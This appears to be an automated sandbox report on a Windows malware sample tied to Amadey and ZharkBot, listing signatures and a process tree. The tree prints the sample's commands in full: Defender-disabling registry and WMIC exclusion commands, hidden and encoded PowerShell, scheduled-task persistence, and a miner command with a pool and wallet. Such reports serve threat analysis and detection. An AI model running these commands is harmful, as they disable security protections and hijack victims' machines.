Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-08-2024 16:19

General

  • Target

    9e06eed4e1237ffdc84f0ff666fbe4b39e1bd2c60bd542870f7e1bfb10555951.exe

  • Size

    425KB

  • MD5

    ced97d60021d4a0bfa03ee14ec384c12

  • SHA1

    7af327df2a2d1e0e09034c2bdf6a47f788cec4e4

  • SHA256

    9e06eed4e1237ffdc84f0ff666fbe4b39e1bd2c60bd542870f7e1bfb10555951

  • SHA512

    af0a02daa759010a1edfc78f14c5fe321c10802d0b9df55b515fe501114af0835a05bbd5dd5e2167b4b1f39bb6da787343bf9141d5f811113f71749741b47811

  • SSDEEP

    6144:31YnIct+B6NxMYE4+Sx9SY5pkUM7LOM/9HtlcyKZrr02e7wufA5oVt1ZuWu1KBF/:0IGxJECSYCLTxKZn1e7C5oVnZuWu3p

Malware Config

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects ZharkBot payload 1 IoCs

    ZharkBot is a botnet written C++.

  • ZharkBot

    ZharkBot is a botnet written C++.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 12 IoCs
  • Indirect Command Execution 1 TTPs 23 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in System32 directory 31 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\9e06eed4e1237ffdc84f0ff666fbe4b39e1bd2c60bd542870f7e1bfb10555951.exe
    "C:\Users\Admin\AppData\Local\Temp\9e06eed4e1237ffdc84f0ff666fbe4b39e1bd2c60bd542870f7e1bfb10555951.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:460
    • C:\Users\Admin\AppData\Local\Temp\1000260001\setup1.exe
      "C:\Users\Admin\AppData\Local\Temp\1000260001\setup1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2200
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
          PID:3736
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          3⤵
          • Drops startup file
          • Suspicious use of AdjustPrivilegeToken
          PID:1244
          • C:\Users\Admin\Pictures\6IUi1xYClZWm1QD5QZayEsgt.exe
            "C:\Users\Admin\Pictures\6IUi1xYClZWm1QD5QZayEsgt.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2200
            • C:\Users\Admin\AppData\Local\Temp\7zS8B82.tmp\Install.exe
              .\Install.exe
              5⤵
              • Executes dropped EXE
              PID:232
              • C:\Users\Admin\AppData\Local\Temp\7zS8E02.tmp\Install.exe
                .\Install.exe /MeYKididJ "385104" /S
                6⤵
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Enumerates system info in registry
                PID:4464
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1908
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                    8⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:3968
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      9⤵
                        PID:5376
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          10⤵
                          • System Location Discovery: System Language Discovery
                          PID:6008
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                      8⤵
                      • Indirect Command Execution
                      PID:5888
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        9⤵
                          PID:444
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            10⤵
                            • System Location Discovery: System Language Discovery
                            PID:4856
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                        8⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:5424
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                          9⤵
                            PID:4156
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                              10⤵
                                PID:5864
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                            8⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:5860
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              9⤵
                                PID:5272
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                  10⤵
                                    PID:2172
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                8⤵
                                • Indirect Command Execution
                                • System Location Discovery: System Language Discovery
                                PID:2704
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                  9⤵
                                    PID:1096
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      10⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5356
                                      • C:\Windows\SysWOW64\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        11⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:6084
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                7⤵
                                • Indirect Command Execution
                                PID:6104
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                  8⤵
                                    PID:5364
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                      9⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5704
                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        10⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5472
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "bISIDNXXYteSJEZXLD" /SC once /ST 16:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8E02.tmp\Install.exe\" W7 /nbNKdidvVb 385104 /S" /V1 /F
                                  7⤵
                                  • Drops file in Windows directory
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:3968
                      • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4456
                        • C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Install.exe
                          .\Install.exe
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:2000
                          • C:\Users\Admin\AppData\Local\Temp\7zS9D0B.tmp\Install.exe
                            .\Install.exe /kHdidM "385107" /S
                            4⤵
                            • Checks BIOS information in registry
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Enumerates system info in registry
                            • Suspicious use of WriteProcessMemory
                            PID:2896
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:4848
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                6⤵
                                • Indirect Command Execution
                                • Suspicious use of WriteProcessMemory
                                PID:3208
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  7⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1548
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    8⤵
                                      PID:1524
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                  6⤵
                                  • Indirect Command Execution
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:1960
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    7⤵
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:1600
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      8⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2592
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                  6⤵
                                  • Indirect Command Execution
                                  • Suspicious use of WriteProcessMemory
                                  PID:2448
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    7⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3968
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      8⤵
                                        PID:3756
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                    6⤵
                                    • Indirect Command Execution
                                    • Suspicious use of WriteProcessMemory
                                    PID:856
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      7⤵
                                        PID:4432
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          8⤵
                                            PID:3348
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                        6⤵
                                        • Indirect Command Execution
                                        • System Location Discovery: System Language Discovery
                                        PID:1472
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                          7⤵
                                            PID:3424
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                              8⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2944
                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                "C:\Windows\system32\gpupdate.exe" /force
                                                9⤵
                                                  PID:1288
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                          5⤵
                                          • Indirect Command Execution
                                          PID:2464
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2512
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                              7⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5552
                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                8⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:5136
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "bISIDNXXYteSJEZXLD" /SC once /ST 16:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS9D0B.tmp\Install.exe\" W7 /HZTadidznc 385107 /S" /V1 /F
                                          5⤵
                                          • Drops file in Windows directory
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:5464
                                  • C:\Users\Admin\AppData\Local\Temp\1000267001\52i.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000267001\52i.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5032
                                  • C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000268001\kitty.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:2744
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 488
                                      3⤵
                                      • Program crash
                                      PID:2848
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2744 -ip 2744
                                  1⤵
                                    PID:6000
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA
                                    1⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5568
                                  • C:\Users\Admin\AppData\Roaming\Guid\TypeId.exe
                                    C:\Users\Admin\AppData\Roaming\Guid\TypeId.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2216
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                      2⤵
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1068
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG -p x --cpu-max-threads-hint=50
                                        3⤵
                                        • Suspicious use of FindShellTrayWindow
                                        PID:3688
                                  • C:\Users\Admin\AppData\Local\Temp\7zS9D0B.tmp\Install.exe
                                    C:\Users\Admin\AppData\Local\Temp\7zS9D0B.tmp\Install.exe W7 /HZTadidznc 385107 /S
                                    1⤵
                                    • Executes dropped EXE
                                    • Drops desktop.ini file(s)
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    PID:4972
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                      2⤵
                                        PID:1808
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                          3⤵
                                          • Indirect Command Execution
                                          • System Location Discovery: System Language Discovery
                                          PID:3160
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5372
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                              5⤵
                                                PID:4492
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                            3⤵
                                            • Indirect Command Execution
                                            • System Location Discovery: System Language Discovery
                                            PID:4772
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                              4⤵
                                                PID:5124
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5016
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                              3⤵
                                              • Indirect Command Execution
                                              PID:5720
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                4⤵
                                                  PID:2944
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                    5⤵
                                                      PID:5092
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                  3⤵
                                                  • Indirect Command Execution
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4440
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                    4⤵
                                                      PID:2440
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                        5⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3532
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                    3⤵
                                                    • Indirect Command Execution
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2508
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:5048
